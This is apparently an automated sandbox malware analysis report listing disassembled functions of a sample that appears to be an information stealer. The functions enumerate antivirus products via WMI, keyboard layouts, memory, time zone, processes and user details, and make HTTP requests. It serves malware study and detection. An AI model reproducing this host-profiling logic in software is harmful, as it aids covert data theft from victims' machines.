                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                        • String ID: ERROR$ERROR$GET
                                                                                                                                                                        • API String ID: 3863758870-2509457195
                                                                                                                                                                        • Opcode ID: 5323fac8edf1b1ef04e08562dc8c26c14760d4b9aa2df3705fc2c7d8a52e5a77
                                                                                                                                                                        • Instruction ID: 73f09b6b2d0cb30233afd7182b355e27675f5699adc1fccbdfeb8c14d2cae55d
                                                                                                                                                                        • Opcode Fuzzy Hash: 5323fac8edf1b1ef04e08562dc8c26c14760d4b9aa2df3705fc2c7d8a52e5a77
                                                                                                                                                                        • Instruction Fuzzy Hash: 46513B71A01169AFDF22BB60DC85AEEBBBCFB04344F0081A6F549A7151DB305E859F90
                                                                                                                                                                        Function 0019196C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2332 19196c-1919d0 call 1af0ed CoInitializeEx CoInitializeSecurity CoCreateInstance 2336 191a75-191a7a 2332->2336 2337 1919d6-191a02 CoSetProxyBlanket 2332->2337 2338 191a8e call 1904bc 2336->2338 2339 191a06-191a08 2337->2339 2343 191a93-191a9a call 1af192 2338->2343 2341 191a0a-191a15 2339->2341 2342 191a6e-191a73 2339->2342 2344 191a68-191a89 2341->2344 2345 191a17-191a2c 2341->2345 2342->2338 2344->2338 2345->2344 2350 191a2e-191a66 VariantInit call 191d17 call 1904bc VariantClear 2345->2350 2350->2343
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00191973
                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000030,00193FA7,?,AV: ,001B68CC,Install Date: ,001B68B8,00000000,Windows: ,001B68A8,Work Dir: In memory,001B6890), ref: 00191982
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00191993
                                                                                                                                                                        • CoCreateInstance.OLE32(001B2F00,00000000,00000001,001B2E30,?), ref: 001919AD
                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001919E3
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00191A32
                                                                                                                                                                          • Part of subcall function 00191D17: LocalAlloc.KERNEL32(00000040,00000005,?,?,00191A55,?), ref: 00191D1F
                                                                                                                                                                          • Part of subcall function 00191D17: CharToOemW.USER32(?,00000000), ref: 00191D2B
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00191A60
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                        • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                        • API String ID: 4288110179-315474579
                                                                                                                                                                        • Opcode ID: 18ef14b01f0c9b548d6f886a2cddc3af0617970d71857a954a9fda55c4d718fa
                                                                                                                                                                        • Instruction ID: b95bad4894bedf1c9c1e13ef597345169fc039fd00888eec7af619e02c6c11b6
                                                                                                                                                                        • Opcode Fuzzy Hash: 18ef14b01f0c9b548d6f886a2cddc3af0617970d71857a954a9fda55c4d718fa
                                                                                                                                                                        • Instruction Fuzzy Hash: F0314871A40249BBCF259B95CC49EEFBABDEFCAB10F104249F111A71D0C7749A81CB20
                                                                                                                                                                        Function 00190DB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,001B670A,?,?), ref: 00190DE1
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00190DEF
                                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00190DFD
                                                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00190E2C
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00190ED4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                        • String ID: /
                                                                                                                                                                        • API String ID: 507856799-4001269591
                                                                                                                                                                        • Opcode ID: b43fa0af2bf4bc50081dc9588074ce7c65627218a2727cb87d2cc758337d4c28
                                                                                                                                                                        • Instruction ID: 4a7507c0371ea932c737ab0f2d49fa6517560f884ab95a866ac5a0cd2cb8ce10
                                                                                                                                                                        • Opcode Fuzzy Hash: b43fa0af2bf4bc50081dc9588074ce7c65627218a2727cb87d2cc758337d4c28
                                                                                                                                                                        • Instruction Fuzzy Hash: E6312875D00228AFDF21AB64EC89A9EB7B8BB18300F1145E6F519B7152CB74AE818F50
                                                                                                                                                                        Function 00192554 Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 0019255E
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00197E73,.exe,001B6CD4,001B6CD0,001B6CCC,001B6CC8,001B6CC4,001B6CC0,001B6CBC,001B6CB8,001B6CB4,001B6CB0,001B6CAC), ref: 0019257D
                                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 0019258D
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0019259F
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 001925B1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 001925C5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1799959500-0
                                                                                                                                                                        • Opcode ID: b9cb689f6ea86836e7b5b0f2f3d258af9a5079fc4ee4dc6bcaa4b50b15bc66df
                                                                                                                                                                        • Instruction ID: 8ca429f841209c6b405b7cc50c6db9b92cec3af2b8c1a3bd46136b8f4bca20f9
                                                                                                                                                                        • Opcode Fuzzy Hash: b9cb689f6ea86836e7b5b0f2f3d258af9a5079fc4ee4dc6bcaa4b50b15bc66df
                                                                                                                                                                        • Instruction Fuzzy Hash: 87013175A01254ABEB22ABA0DC08FFE7BBC9F15700F4401EAE409E71A1D7748E459B21
                                                                                                                                                                        Function 001910EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,001B6918,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC,Install Date: ), ref: 00191106
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0019110D
                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00191129
                                                                                                                                                                        • wsprintfA.USER32 ref: 0019114F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                        • String ID: %d MB
                                                                                                                                                                        • API String ID: 3644086013-2651807785
                                                                                                                                                                        • Opcode ID: 8429b9d03aabd924042db9825ea7e72fec759760735c4e087bbaedc148eaf445
                                                                                                                                                                        • Instruction ID: b4975a3231e7a2b36b1890562b4264542d83533f8179959934230ab72b21e896
                                                                                                                                                                        • Opcode Fuzzy Hash: 8429b9d03aabd924042db9825ea7e72fec759760735c4e087bbaedc148eaf445
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F0136B5A41218BBEB05EFB4EC45AFE7BBCEF04B14F440126F502E7290DB7499818765
                                                                                                                                                                        Function 0019147A Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001B670F,?,?), ref: 001914A9
                                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 001914B9
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00191517
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00191522
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 907984538-0
                                                                                                                                                                        • Opcode ID: 0bbd3d86069399892e48c3a323b98e3aded648ec1a86d9d9fda2025271476ec4
                                                                                                                                                                        • Instruction ID: 8ce0e0ee802b45d561ef4f216af32cd0e7e26c2cd93e00f5bd0dfc27f9d0b634
                                                                                                                                                                        • Opcode Fuzzy Hash: 0bbd3d86069399892e48c3a323b98e3aded648ec1a86d9d9fda2025271476ec4
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C118275A002189BEB22BB64EC85AFE77ACAF58700F050095F80AB7251DB74EE858F50
                                                                                                                                                                        Function 00190D03 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00190D1E
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00190D25
                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 00190D34
                                                                                                                                                                        • wsprintfA.USER32 ref: 00190D52
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
